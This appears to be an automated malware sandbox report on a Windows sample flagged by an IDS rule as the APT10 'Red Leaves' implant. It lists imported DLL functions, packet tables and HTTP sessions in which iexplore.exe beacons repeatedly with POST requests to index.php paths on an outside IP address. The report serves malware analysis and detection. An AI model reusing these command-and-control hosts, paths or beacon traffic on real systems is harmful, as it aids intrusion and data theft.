    GDI32.dllGetLayout, SetLayout, DeleteObject, SelectClipRgn, CreateRectRgn, GetViewportExtEx, GetWindowExtEx, BitBlt, GetPixel, PtVisible, RectVisible, TextOutA, ExtTextOutA, Escape, SelectObject, SetViewportOrgEx, OffsetViewportOrgEx, SetViewportExtEx, ScaleViewportExtEx, SetWindowOrgEx, OffsetWindowOrgEx, SetWindowExtEx, ScaleWindowExtEx, ExtSelectClipRgn, DeleteDC, CreatePatternBrush, GetStockObject, SelectPalette, GetObjectType, CreatePen, CreateSolidBrush, CreateHatchBrush, GetTextExtentPoint32A, CreateRectRgnIndirect, PatBlt, CreateDIBitmap, GetTextMetricsA, EnumFontFamiliesA, GetTextCharsetInfo, CombineRgn, GetMapMode, DPtoLP, GetBkColor, GetTextColor, GetRgnBox, CreateDIBSection, CreateRoundRectRgn, CreatePolygonRgn, CreateEllipticRgn, Polyline, Polygon, CreatePalette, GetPaletteEntries, GetNearestPaletteIndex, RealizePalette, GetSystemPaletteEntries, OffsetRgn, SetDIBColorTable, StretchBlt, SetPixel, Rectangle, EnumFontFamiliesExA, LPtoDP, GetWindowOrgEx, GetViewportOrgEx, PtInRegion, FillRgn, FrameRgn, GetBoundsRect, ExtFloodFill, SetPaletteEntries, GetTextFaceA, SetPixelV, MoveToEx, SetTextAlign, LineTo, IntersectClipRect, ExcludeClipRect, GetClipBox, SetMapMode, SetROP2, SetPolyFillMode, SetBkMode, RestoreDC, SaveDC, CreateDCA, CopyMetaFileA, GetDeviceCaps, CreateFontIndirectA, CreateBitmap, GetObjectA, SetBkColor, SetTextColor, CreateCompatibleDC, SetRectRgn, Ellipse, CreateCompatibleBitmap
    MSIMG32.dllAlphaBlend, TransparentBlt
    COMDLG32.dllGetFileTitleA
    WINSPOOL.DRVOpenPrinterA, DocumentPropertiesA, ClosePrinter
    ADVAPI32.dllRegEnumValueA, RegQueryValueExA, RegOpenKeyExA, RegCreateKeyExA, RegSetValueExA, RegDeleteValueA, RegDeleteKeyA, RegEnumKeyA, RegQueryValueA, RegEnumKeyExA, RegOpenKeyExW, RegCloseKey, RegSetValueA, GetFileSecurityA, SetFileSecurityA
    SHELL32.dllSHAppBarMessage, ShellExecuteA, DragFinish, DragQueryFileA, SHAddToRecentDocs, ExtractIconA, SHBrowseForFolderA, SHGetSpecialFolderPathA, SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHGetDesktopFolder, SHGetFileInfoA
    COMCTL32.dllImageList_GetIconSize
    SHLWAPI.dllPathFindFileNameA, PathStripToRootA, PathIsUNCA, PathFindExtensionA, PathRemoveFileSpecW
    ole32.dllOleIsCurrentClipboard, OleLockRunning, IsAccelerator, OleTranslateAccelerator, OleDestroyMenuDescriptor, OleCreateMenuDescriptor, OleInitialize, CoFreeUnusedLibraries, OleUninitialize, CoInitializeEx, CreateStreamOnHGlobal, CreateILockBytesOnHGlobal, StgCreateDocfileOnILockBytes, CoGetClassObject, OleFlushClipboard, OleDuplicateData, ReleaseStgMedium, StringFromCLSID, CoTaskMemFree, CoTaskMemAlloc, CLSIDFromString, CoCreateGuid, CLSIDFromProgID, CoInitialize, CoCreateInstance, CoUninitialize, DoDragDrop, RevokeDragDrop, CoLockObjectExternal, RegisterDragDrop, OleGetClipboard, CoRegisterMessageFilter, CoRevokeClassObject, StgOpenStorageOnILockBytes
    OLEAUT32.dllSysStringLen, OleCreateFontIndirect, VariantTimeToSystemTime, SystemTimeToVariantTime, SafeArrayDestroy, VariantCopy, VarBstrFromDate, SysAllocStringByteLen, SysFreeString, VariantChangeType, SysAllocStringLen, VariantInit, VariantClear, SysAllocString
    oledlg.dll
    OLEACC.dllAccessibleObjectFromWindow, CreateStdAccessibleObject, LresultFromObject
    gdiplus.dllGdipGetImageGraphicsContext, GdipBitmapUnlockBits, GdipBitmapLockBits, GdipCreateBitmapFromScan0, GdipCreateBitmapFromStream, GdipGetImagePalette, GdipGetImagePaletteSize, GdipGetImagePixelFormat, GdipGetImageHeight, GdipGetImageWidth, GdipCloneImage, GdipDrawImageRectI, GdipSetInterpolationMode, GdipCreateFromHDC, GdiplusShutdown, GdiplusStartup, GdipCreateBitmapFromHBITMAP, GdipDisposeImage, GdipDeleteGraphics, GdipAlloc, GdipFree, GdipDrawImageI
    IMM32.dllImmReleaseContext, ImmGetContext, ImmGetOpenStatus
    WINMM.dllPlaySoundA

    Version Infos

    DescriptionData
    Translation0x0009 0x04b0

    Possible Origin

    Language of compilation systemCountry where language is spokenMap
    ChineseChina
    EnglishUnited States

    Network Behavior

    Snort IDS Alerts

    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
    03/10/22-07:23:02.013122TCP2024173ET TROJAN Red Leaves magic packet detected (APT10 implant)4976480192.168.2.467.205.132.17

    Network Port Distribution

    TCP Packets

    TimestampSource PortDest PortSource IPDest IP
    Mar 10, 2022 07:21:37.608027935 CET49736443192.168.2.467.205.132.17
    Mar 10, 2022 07:21:37.608115911 CET4434973667.205.132.17192.168.2.4
    Mar 10, 2022 07:21:37.608268023 CET49736443192.168.2.467.205.132.17
    Mar 10, 2022 07:21:37.608624935 CET49736443192.168.2.467.205.132.17
    Mar 10, 2022 07:21:37.608640909 CET4434973667.205.132.17192.168.2.4
    Mar 10, 2022 07:21:37.608659029 CET49736443192.168.2.467.205.132.17
    Mar 10, 2022 07:21:37.608669996 CET4434973667.205.132.17192.168.2.4
    Mar 10, 2022 07:21:37.608793974 CET4434973667.205.132.17192.168.2.4
    Mar 10, 2022 07:21:42.973103046 CET49737443192.168.2.467.205.132.17
    Mar 10, 2022 07:21:42.973156929 CET4434973767.205.132.17192.168.2.4
    Mar 10, 2022 07:21:42.973328114 CET49737443192.168.2.467.205.132.17
    Mar 10, 2022 07:21:42.974839926 CET49737443192.168.2.467.205.132.17
    Mar 10, 2022 07:21:42.974857092 CET4434973767.205.132.17192.168.2.4
    Mar 10, 2022 07:21:42.974925041 CET4434973767.205.132.17192.168.2.4
    Mar 10, 2022 07:21:42.974950075 CET49737443192.168.2.467.205.132.17
    Mar 10, 2022 07:21:42.974972963 CET4434973767.205.132.17192.168.2.4
    Mar 10, 2022 07:21:42.976782084 CET49738443192.168.2.467.205.132.17
    Mar 10, 2022 07:21:42.976818085 CET4434973867.205.132.17192.168.2.4
    Mar 10, 2022 07:21:42.976900101 CET49738443192.168.2.467.205.132.17
    Mar 10, 2022 07:21:42.977200031 CET49738443192.168.2.467.205.132.17
    Mar 10, 2022 07:21:42.977219105 CET4434973867.205.132.17192.168.2.4
    Mar 10, 2022 07:21:42.977279902 CET49738443192.168.2.467.205.132.17
    Mar 10, 2022 07:21:42.977293015 CET4434973867.205.132.17192.168.2.4
    Mar 10, 2022 07:21:42.977401018 CET4434973867.205.132.17192.168.2.4
    Mar 10, 2022 07:21:42.992253065 CET49739443192.168.2.467.205.132.17
    Mar 10, 2022 07:21:42.992326021 CET4434973967.205.132.17192.168.2.4
    Mar 10, 2022 07:21:42.992415905 CET49739443192.168.2.467.205.132.17
    Mar 10, 2022 07:21:42.993453026 CET49739443192.168.2.467.205.132.17
    Mar 10, 2022 07:21:42.993479013 CET4434973967.205.132.17192.168.2.4
    Mar 10, 2022 07:21:42.993547916 CET4434973967.205.132.17192.168.2.4
    Mar 10, 2022 07:21:42.995389938 CET49740443192.168.2.467.205.132.17
    Mar 10, 2022 07:21:42.995440960 CET4434974067.205.132.17192.168.2.4
    Mar 10, 2022 07:21:42.995537996 CET49740443192.168.2.467.205.132.17
    Mar 10, 2022 07:21:42.995886087 CET49740443192.168.2.467.205.132.17
    Mar 10, 2022 07:21:42.995913029 CET4434974067.205.132.17192.168.2.4
    Mar 10, 2022 07:21:42.995955944 CET4434974067.205.132.17192.168.2.4
    Mar 10, 2022 07:21:42.995991945 CET49740443192.168.2.467.205.132.17
    Mar 10, 2022 07:21:42.996011972 CET4434974067.205.132.17192.168.2.4
    Mar 10, 2022 07:21:42.997436047 CET49741443192.168.2.467.205.132.17
    Mar 10, 2022 07:21:42.997484922 CET4434974167.205.132.17192.168.2.4
    Mar 10, 2022 07:21:42.998003960 CET49741443192.168.2.467.205.132.17
    Mar 10, 2022 07:21:42.998060942 CET49741443192.168.2.467.205.132.17
    Mar 10, 2022 07:21:42.998078108 CET4434974167.205.132.17192.168.2.4
    Mar 10, 2022 07:21:42.998094082 CET49741443192.168.2.467.205.132.17
    Mar 10, 2022 07:21:42.998102903 CET4434974167.205.132.17192.168.2.4
    Mar 10, 2022 07:21:42.998209000 CET4434974167.205.132.17192.168.2.4
    Mar 10, 2022 07:21:53.106363058 CET49743443192.168.2.4144.168.45.116
    Mar 10, 2022 07:21:53.106456041 CET44349743144.168.45.116192.168.2.4
    Mar 10, 2022 07:21:53.106570959 CET49743443192.168.2.4144.168.45.116
    Mar 10, 2022 07:21:53.108678102 CET49743443192.168.2.4144.168.45.116
    Mar 10, 2022 07:21:53.108748913 CET44349743144.168.45.116192.168.2.4
    Mar 10, 2022 07:21:53.108772039 CET49743443192.168.2.4144.168.45.116
    Mar 10, 2022 07:21:53.108789921 CET44349743144.168.45.116192.168.2.4
    Mar 10, 2022 07:21:53.108952999 CET44349743144.168.45.116192.168.2.4
    Mar 10, 2022 07:22:03.153788090 CET4974653192.168.2.467.205.132.17
    Mar 10, 2022 07:22:06.168540955 CET4974653192.168.2.467.205.132.17
    Mar 10, 2022 07:22:12.184732914 CET4974653192.168.2.467.205.132.17
    Mar 10, 2022 07:22:12.366229057 CET49747443192.168.2.467.205.132.17
    Mar 10, 2022 07:22:12.366271973 CET4434974767.205.132.17192.168.2.4
    Mar 10, 2022 07:22:12.366451979 CET49747443192.168.2.467.205.132.17
    Mar 10, 2022 07:22:12.366818905 CET49747443192.168.2.467.205.132.17
    Mar 10, 2022 07:22:12.366833925 CET4434974767.205.132.17192.168.2.4
    Mar 10, 2022 07:22:12.366939068 CET4434974767.205.132.17192.168.2.4
    Mar 10, 2022 07:22:12.368575096 CET49748443192.168.2.467.205.132.17
    Mar 10, 2022 07:22:12.368624926 CET4434974867.205.132.17192.168.2.4
    Mar 10, 2022 07:22:12.368717909 CET49748443192.168.2.467.205.132.17
    Mar 10, 2022 07:22:12.369051933 CET49748443192.168.2.467.205.132.17
    Mar 10, 2022 07:22:12.369082928 CET4434974867.205.132.17192.168.2.4
    Mar 10, 2022 07:22:12.369129896 CET4434974867.205.132.17192.168.2.4
    Mar 10, 2022 07:22:12.369153023 CET49748443192.168.2.467.205.132.17
    Mar 10, 2022 07:22:12.369174957 CET4434974867.205.132.17192.168.2.4
    Mar 10, 2022 07:22:12.370532990 CET49749443192.168.2.467.205.132.17
    Mar 10, 2022 07:22:12.370563984 CET4434974967.205.132.17192.168.2.4
    Mar 10, 2022 07:22:12.370745897 CET49749443192.168.2.467.205.132.17
    Mar 10, 2022 07:22:12.372329950 CET49749443192.168.2.467.205.132.17
    Mar 10, 2022 07:22:12.372349024 CET4434974967.205.132.17192.168.2.4
    Mar 10, 2022 07:22:12.372400045 CET4434974967.205.132.17192.168.2.4
    Mar 10, 2022 07:22:12.372473955 CET49749443192.168.2.467.205.132.17
    Mar 10, 2022 07:22:12.372488022 CET4434974967.205.132.17192.168.2.4
    Mar 10, 2022 07:22:12.374878883 CET49750443192.168.2.467.205.132.17
    Mar 10, 2022 07:22:12.374902964 CET4434975067.205.132.17192.168.2.4
    Mar 10, 2022 07:22:12.374969959 CET49750443192.168.2.467.205.132.17
    Mar 10, 2022 07:22:12.375251055 CET49750443192.168.2.467.205.132.17
    Mar 10, 2022 07:22:12.375267029 CET4434975067.205.132.17192.168.2.4
    Mar 10, 2022 07:22:12.375308990 CET4434975067.205.132.17192.168.2.4
    Mar 10, 2022 07:22:12.375382900 CET49750443192.168.2.467.205.132.17
    Mar 10, 2022 07:22:12.375394106 CET4434975067.205.132.17192.168.2.4
    Mar 10, 2022 07:22:12.396006107 CET49751443192.168.2.467.205.132.17
    Mar 10, 2022 07:22:12.396064997 CET4434975167.205.132.17192.168.2.4
    Mar 10, 2022 07:22:12.396150112 CET49751443192.168.2.467.205.132.17
    Mar 10, 2022 07:22:12.396461010 CET49751443192.168.2.467.205.132.17
    Mar 10, 2022 07:22:12.396492958 CET4434975167.205.132.17192.168.2.4
    Mar 10, 2022 07:22:12.396565914 CET4434975167.205.132.17192.168.2.4
    Mar 10, 2022 07:22:22.436521053 CET49756443192.168.2.4144.168.45.116
    Mar 10, 2022 07:22:22.436614990 CET44349756144.168.45.116192.168.2.4
    Mar 10, 2022 07:22:22.436717033 CET49756443192.168.2.4144.168.45.116
    Mar 10, 2022 07:22:22.437103033 CET49756443192.168.2.4144.168.45.116
    Mar 10, 2022 07:22:22.437125921 CET44349756144.168.45.116192.168.2.4
    Mar 10, 2022 07:22:22.437145948 CET49756443192.168.2.4144.168.45.116
    Mar 10, 2022 07:22:22.437156916 CET44349756144.168.45.116192.168.2.4
    Mar 10, 2022 07:22:22.437196016 CET44349756144.168.45.116192.168.2.4
    Mar 10, 2022 07:22:32.485387087 CET49757995192.168.2.467.205.132.17
    Mar 10, 2022 07:22:35.499186993 CET49757995192.168.2.467.205.132.17
    Mar 10, 2022 07:22:41.499576092 CET49757995192.168.2.467.205.132.17
    Mar 10, 2022 07:22:41.756865025 CET49758443192.168.2.467.205.132.17
    Mar 10, 2022 07:22:41.756936073 CET4434975867.205.132.17192.168.2.4
    Mar 10, 2022 07:22:41.757055998 CET49758443192.168.2.467.205.132.17
    Mar 10, 2022 07:22:41.757384062 CET49758443192.168.2.467.205.132.17
    Mar 10, 2022 07:22:41.757410049 CET4434975867.205.132.17192.168.2.4
    Mar 10, 2022 07:22:41.757497072 CET4434975867.205.132.17192.168.2.4
    Mar 10, 2022 07:22:41.757600069 CET49758443192.168.2.467.205.132.17
    Mar 10, 2022 07:22:41.757621050 CET4434975867.205.132.17192.168.2.4
    Mar 10, 2022 07:22:41.759078026 CET49759443192.168.2.467.205.132.17
    Mar 10, 2022 07:22:41.759146929 CET4434975967.205.132.17192.168.2.4
    Mar 10, 2022 07:22:41.760272026 CET49759443192.168.2.467.205.132.17
    Mar 10, 2022 07:22:41.760591984 CET49759443192.168.2.467.205.132.17
    Mar 10, 2022 07:22:41.760622978 CET4434975967.205.132.17192.168.2.4
    Mar 10, 2022 07:22:41.760663986 CET49759443192.168.2.467.205.132.17
    Mar 10, 2022 07:22:41.760668039 CET4434975967.205.132.17192.168.2.4
    Mar 10, 2022 07:22:41.760693073 CET4434975967.205.132.17192.168.2.4
    Mar 10, 2022 07:22:41.762319088 CET49760443192.168.2.467.205.132.17
    Mar 10, 2022 07:22:41.762377024 CET4434976067.205.132.17192.168.2.4
    Mar 10, 2022 07:22:41.762454033 CET49760443192.168.2.467.205.132.17
    Mar 10, 2022 07:22:41.762743950 CET49760443192.168.2.467.205.132.17
    Mar 10, 2022 07:22:41.762769938 CET4434976067.205.132.17192.168.2.4
    Mar 10, 2022 07:22:41.762810946 CET4434976067.205.132.17192.168.2.4
    Mar 10, 2022 07:22:41.762919903 CET49760443192.168.2.467.205.132.17
    Mar 10, 2022 07:22:41.762937069 CET4434976067.205.132.17192.168.2.4
    Mar 10, 2022 07:22:41.764241934 CET49761443192.168.2.467.205.132.17
    Mar 10, 2022 07:22:41.764287949 CET4434976167.205.132.17192.168.2.4
    Mar 10, 2022 07:22:41.764377117 CET49761443192.168.2.467.205.132.17
    Mar 10, 2022 07:22:41.764647961 CET49761443192.168.2.467.205.132.17
    Mar 10, 2022 07:22:41.764672995 CET4434976167.205.132.17192.168.2.4
    Mar 10, 2022 07:22:41.764715910 CET4434976167.205.132.17192.168.2.4
    Mar 10, 2022 07:22:41.764782906 CET49761443192.168.2.467.205.132.17
    Mar 10, 2022 07:22:41.764801979 CET4434976167.205.132.17192.168.2.4
    Mar 10, 2022 07:22:41.821080923 CET49762443192.168.2.467.205.132.17
    Mar 10, 2022 07:22:41.821141005 CET4434976267.205.132.17192.168.2.4
    Mar 10, 2022 07:22:41.821234941 CET49762443192.168.2.467.205.132.17
    Mar 10, 2022 07:22:41.821583033 CET49762443192.168.2.467.205.132.17
    Mar 10, 2022 07:22:41.821615934 CET4434976267.205.132.17192.168.2.4
    Mar 10, 2022 07:22:41.821687937 CET4434976267.205.132.17192.168.2.4
    Mar 10, 2022 07:22:41.821732998 CET49762443192.168.2.467.205.132.17
    Mar 10, 2022 07:22:41.821763039 CET4434976267.205.132.17192.168.2.4
    Mar 10, 2022 07:22:51.860562086 CET49763443192.168.2.4144.168.45.116
    Mar 10, 2022 07:22:51.860620022 CET44349763144.168.45.116192.168.2.4
    Mar 10, 2022 07:22:51.860721111 CET49763443192.168.2.4144.168.45.116
    Mar 10, 2022 07:22:51.861187935 CET49763443192.168.2.4144.168.45.116
    Mar 10, 2022 07:22:51.861203909 CET44349763144.168.45.116192.168.2.4
    Mar 10, 2022 07:22:51.861249924 CET44349763144.168.45.116192.168.2.4
    Mar 10, 2022 07:22:51.861258984 CET49763443192.168.2.4144.168.45.116
    Mar 10, 2022 07:22:51.861270905 CET44349763144.168.45.116192.168.2.4
    Mar 10, 2022 07:23:01.908960104 CET4976480192.168.2.467.205.132.17
    Mar 10, 2022 07:23:02.012634039 CET804976467.205.132.17192.168.2.4
    Mar 10, 2022 07:23:02.012759924 CET4976480192.168.2.467.205.132.17
    Mar 10, 2022 07:23:02.013122082 CET4976480192.168.2.467.205.132.17
    Mar 10, 2022 07:23:02.013169050 CET4976480192.168.2.467.205.132.17
    Mar 10, 2022 07:23:02.116442919 CET804976467.205.132.17192.168.2.4
    Mar 10, 2022 07:23:02.116471052 CET804976467.205.132.17192.168.2.4
    Mar 10, 2022 07:23:02.116496086 CET804976467.205.132.17192.168.2.4
    Mar 10, 2022 07:23:02.116514921 CET804976467.205.132.17192.168.2.4
    Mar 10, 2022 07:23:02.116650105 CET4976480192.168.2.467.205.132.17
    Mar 10, 2022 07:23:07.486567020 CET49765443192.168.2.467.205.132.17
    Mar 10, 2022 07:23:07.486629963 CET4434976567.205.132.17192.168.2.4
    Mar 10, 2022 07:23:07.486742973 CET49765443192.168.2.467.205.132.17
    Mar 10, 2022 07:23:07.487189054 CET49765443192.168.2.467.205.132.17
    Mar 10, 2022 07:23:07.487215042 CET4434976567.205.132.17192.168.2.4
    Mar 10, 2022 07:23:07.487267971 CET49765443192.168.2.467.205.132.17
    Mar 10, 2022 07:23:07.487281084 CET4434976567.205.132.17192.168.2.4
    Mar 10, 2022 07:23:07.487313032 CET4434976567.205.132.17192.168.2.4
    Mar 10, 2022 07:23:07.488965988 CET49766443192.168.2.467.205.132.17
    Mar 10, 2022 07:23:07.488998890 CET4434976667.205.132.17192.168.2.4
    Mar 10, 2022 07:23:07.489103079 CET49766443192.168.2.467.205.132.17
    Mar 10, 2022 07:23:07.489439964 CET49766443192.168.2.467.205.132.17
    Mar 10, 2022 07:23:07.489464998 CET4434976667.205.132.17192.168.2.4
    Mar 10, 2022 07:23:07.489515066 CET4434976667.205.132.17192.168.2.4
    Mar 10, 2022 07:23:07.489613056 CET49766443192.168.2.467.205.132.17
    Mar 10, 2022 07:23:07.489633083 CET4434976667.205.132.17192.168.2.4
    Mar 10, 2022 07:23:07.491219997 CET49767443192.168.2.467.205.132.17
    Mar 10, 2022 07:23:07.491257906 CET4434976767.205.132.17192.168.2.4
    Mar 10, 2022 07:23:07.491483927 CET49767443192.168.2.467.205.132.17
    Mar 10, 2022 07:23:07.491816044 CET49767443192.168.2.467.205.132.17
    Mar 10, 2022 07:23:07.491835117 CET4434976767.205.132.17192.168.2.4
    Mar 10, 2022 07:23:07.491875887 CET4434976767.205.132.17192.168.2.4
    Mar 10, 2022 07:23:07.492024899 CET49767443192.168.2.467.205.132.17
    Mar 10, 2022 07:23:07.492069006 CET4434976767.205.132.17192.168.2.4
    Mar 10, 2022 07:23:07.493947029 CET49768443192.168.2.467.205.132.17
    Mar 10, 2022 07:23:07.494015932 CET4434976867.205.132.17192.168.2.4
    Mar 10, 2022 07:23:07.497068882 CET49768443192.168.2.467.205.132.17
    Mar 10, 2022 07:23:07.497479916 CET49768443192.168.2.467.205.132.17
    Mar 10, 2022 07:23:07.497514963 CET4434976867.205.132.17192.168.2.4
    Mar 10, 2022 07:23:07.497564077 CET49768443192.168.2.467.205.132.17
    Mar 10, 2022 07:23:07.497575998 CET4434976867.205.132.17192.168.2.4
    Mar 10, 2022 07:23:07.497601032 CET4434976867.205.132.17192.168.2.4
    Mar 10, 2022 07:23:07.499073982 CET49769443192.168.2.467.205.132.17
    Mar 10, 2022 07:23:07.499128103 CET4434976967.205.132.17192.168.2.4
    Mar 10, 2022 07:23:07.502388954 CET49769443192.168.2.467.205.132.17
    Mar 10, 2022 07:23:07.508974075 CET49769443192.168.2.467.205.132.17
    Mar 10, 2022 07:23:07.509027958 CET4434976967.205.132.17192.168.2.4
    Mar 10, 2022 07:23:07.509052038 CET49769443192.168.2.467.205.132.17
    Mar 10, 2022 07:23:07.509063959 CET4434976967.205.132.17192.168.2.4
    Mar 10, 2022 07:23:07.509160995 CET4434976967.205.132.17192.168.2.4
    Mar 10, 2022 07:23:12.533687115 CET4976480192.168.2.467.205.132.17
    Mar 10, 2022 07:23:17.550909042 CET49770443192.168.2.4144.168.45.116
    Mar 10, 2022 07:23:17.550981998 CET44349770144.168.45.116192.168.2.4
    Mar 10, 2022 07:23:17.551107883 CET49770443192.168.2.4144.168.45.116
    Mar 10, 2022 07:23:17.551667929 CET49770443192.168.2.4144.168.45.116
    Mar 10, 2022 07:23:17.551698923 CET44349770144.168.45.116192.168.2.4
    Mar 10, 2022 07:23:17.551769018 CET49770443192.168.2.4144.168.45.116
    Mar 10, 2022 07:23:17.551795959 CET44349770144.168.45.116192.168.2.4
    Mar 10, 2022 07:23:27.600503922 CET49771443192.168.2.467.205.132.17
    Mar 10, 2022 07:23:27.600574970 CET4434977167.205.132.17192.168.2.4
    Mar 10, 2022 07:23:27.601896048 CET49771443192.168.2.467.205.132.17
    Mar 10, 2022 07:23:27.602406979 CET49771443192.168.2.467.205.132.17
    Mar 10, 2022 07:23:27.602438927 CET4434977167.205.132.17192.168.2.4
    Mar 10, 2022 07:23:27.602456093 CET49771443192.168.2.467.205.132.17
    Mar 10, 2022 07:23:27.602464914 CET4434977167.205.132.17192.168.2.4
    Mar 10, 2022 07:23:27.602531910 CET4434977167.205.132.17192.168.2.4
    Mar 10, 2022 07:23:32.737730026 CET49772443192.168.2.467.205.132.17
    Mar 10, 2022 07:23:32.737780094 CET4434977267.205.132.17192.168.2.4
    Mar 10, 2022 07:23:32.737865925 CET49772443192.168.2.467.205.132.17
    Mar 10, 2022 07:23:32.738704920 CET49772443192.168.2.467.205.132.17
    Mar 10, 2022 07:23:32.738723040 CET4434977267.205.132.17192.168.2.4
    Mar 10, 2022 07:23:32.738790035 CET49772443192.168.2.467.205.132.17
    Mar 10, 2022 07:23:32.738800049 CET4434977267.205.132.17192.168.2.4
    Mar 10, 2022 07:23:32.738898039 CET4434977267.205.132.17192.168.2.4
    Mar 10, 2022 07:23:32.741889000 CET49773443192.168.2.467.205.132.17
    Mar 10, 2022 07:23:32.741935968 CET4434977367.205.132.17192.168.2.4
    Mar 10, 2022 07:23:32.742029905 CET49773443192.168.2.467.205.132.17
    Mar 10, 2022 07:23:32.745321989 CET49773443192.168.2.467.205.132.17
    Mar 10, 2022 07:23:32.745356083 CET4434977367.205.132.17192.168.2.4
    Mar 10, 2022 07:23:32.745388985 CET4434977367.205.132.17192.168.2.4
    Mar 10, 2022 07:23:32.747672081 CET49774443192.168.2.467.205.132.17
    Mar 10, 2022 07:23:32.747715950 CET4434977467.205.132.17192.168.2.4
    Mar 10, 2022 07:23:32.747786045 CET49774443192.168.2.467.205.132.17
    Mar 10, 2022 07:23:32.748333931 CET49774443192.168.2.467.205.132.17
    Mar 10, 2022 07:23:32.748358965 CET4434977467.205.132.17192.168.2.4
    Mar 10, 2022 07:23:32.748398066 CET4434977467.205.132.17192.168.2.4
    Mar 10, 2022 07:23:32.748428106 CET49774443192.168.2.467.205.132.17
    Mar 10, 2022 07:23:32.748446941 CET4434977467.205.132.17192.168.2.4
    Mar 10, 2022 07:23:32.750837088 CET49775443192.168.2.467.205.132.17
    Mar 10, 2022 07:23:32.750869989 CET4434977567.205.132.17192.168.2.4
    Mar 10, 2022 07:23:32.750950098 CET49775443192.168.2.467.205.132.17
    Mar 10, 2022 07:23:32.760200977 CET49775443192.168.2.467.205.132.17
    Mar 10, 2022 07:23:32.760236025 CET4434977567.205.132.17192.168.2.4
    Mar 10, 2022 07:23:32.760302067 CET4434977567.205.132.17192.168.2.4
    Mar 10, 2022 07:23:32.764406919 CET49776443192.168.2.467.205.132.17
    Mar 10, 2022 07:23:32.764461040 CET4434977667.205.132.17192.168.2.4
    Mar 10, 2022 07:23:32.764542103 CET49776443192.168.2.467.205.132.17
    Mar 10, 2022 07:23:32.765038967 CET49776443192.168.2.467.205.132.17
    Mar 10, 2022 07:23:32.765058041 CET4434977667.205.132.17192.168.2.4
    Mar 10, 2022 07:23:32.765125036 CET4434977667.205.132.17192.168.2.4
    Mar 10, 2022 07:23:32.765129089 CET49776443192.168.2.467.205.132.17
    Mar 10, 2022 07:23:32.765146017 CET4434977667.205.132.17192.168.2.4

    HTTP Request Dependency Graph

    • 67.205.132.17:443

    HTTP Packets

    Session IDSource IPSource PortDestination IPDestination PortProcess
    0192.168.2.44973767.205.132.17443C:\Program Files (x86)\Internet Explorer\iexplore.exe
    TimestampkBytes transferredDirectionData
    Mar 10, 2022 07:21:42.974839926 CET838OUTPOST /NEZTl2/index.php HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    Content-Length: 133
    Host: 67.205.132.17:443


    Session IDSource IPSource PortDestination IPDestination PortProcess
    1192.168.2.44973867.205.132.17443C:\Program Files (x86)\Internet Explorer\iexplore.exe
    TimestampkBytes transferredDirectionData
    Mar 10, 2022 07:21:42.977200031 CET838OUTPOST /NEZTl2/index.php HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    Content-Length: 133
    Host: 67.205.132.17:443


    Session IDSource IPSource PortDestination IPDestination PortProcess
    10192.168.2.44975867.205.132.17443C:\Program Files (x86)\Internet Explorer\iexplore.exe
    TimestampkBytes transferredDirectionData
    Mar 10, 2022 07:22:41.757384062 CET1124OUTPOST /hvnqlRD8z/index.php HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    Content-Length: 133
    Host: 67.205.132.17:443


    Session IDSource IPSource PortDestination IPDestination PortProcess
    11192.168.2.44975967.205.132.17443C:\Program Files (x86)\Internet Explorer\iexplore.exe
    TimestampkBytes transferredDirectionData
    Mar 10, 2022 07:22:41.760591984 CET1125OUTPOST /hvnqlRD8z/index.php HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    Content-Length: 133
    Host: 67.205.132.17:443


    Session IDSource IPSource PortDestination IPDestination PortProcess
    12192.168.2.44976067.205.132.17443C:\Program Files (x86)\Internet Explorer\iexplore.exe
    TimestampkBytes transferredDirectionData
    Mar 10, 2022 07:22:41.762743950 CET1126OUTPOST /hvnqlRD8z/index.php HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    Content-Length: 133
    Host: 67.205.132.17:443


    Session IDSource IPSource PortDestination IPDestination PortProcess
    13192.168.2.44976167.205.132.17443C:\Program Files (x86)\Internet Explorer\iexplore.exe
    TimestampkBytes transferredDirectionData
    Mar 10, 2022 07:22:41.764647961 CET1126OUTPOST /hvnqlRD8z/index.php HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    Content-Length: 133
    Host: 67.205.132.17:443


    Session IDSource IPSource PortDestination IPDestination PortProcess
    14192.168.2.44976267.205.132.17443C:\Program Files (x86)\Internet Explorer\iexplore.exe
    TimestampkBytes transferredDirectionData
    Mar 10, 2022 07:22:41.821583033 CET1127OUTPOST /hvnqlRD8z/index.php HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    Content-Length: 133
    Host: 67.205.132.17:443


    Session IDSource IPSource PortDestination IPDestination PortProcess
    15192.168.2.44976467.205.132.1780C:\Program Files (x86)\Internet Explorer\iexplore.exe
    TimestampkBytes transferredDirectionData
    Mar 10, 2022 07:23:02.013122082 CET1128OUTData Raw: 42 0c 00 00 7a 8d 9b dc 85 00 00 00
    Data Ascii: Bz
    Mar 10, 2022 07:23:02.013169050 CET1128OUTData Raw: 32 75 63 6b 35 75 63 6b e2 be ba d4 2d 7a 58 da 4f d5 95 07 3e 8e 2a 26 50 b3 03 72 99 d5 c4 d4 2e e6 a5 1d c5 f5 a0 c7 b0 0c ca 99 1a 32 93 a5 a4 af 88 85 ad 3f 7b 3c 0b a2 65 15 46 f9 e0 1e ad a9 80 75 68 31 6f dc fb 1c 37 7d e2 ee 2d 6b d7 5f
    Data Ascii: 2uck5uck-zXO>*&Pr.2?{<eFuh1o7}-k_Fzs"?l@LeAS@) ]*X?oe+l-
    Mar 10, 2022 07:23:02.116496086 CET1129INHTTP/1.1 400 Bad Request
    Server: nginx
    Date: Thu, 10 Mar 2022 06:23:02 GMT
    Content-Type: text/html
    Content-Length: 150
    Connection: close
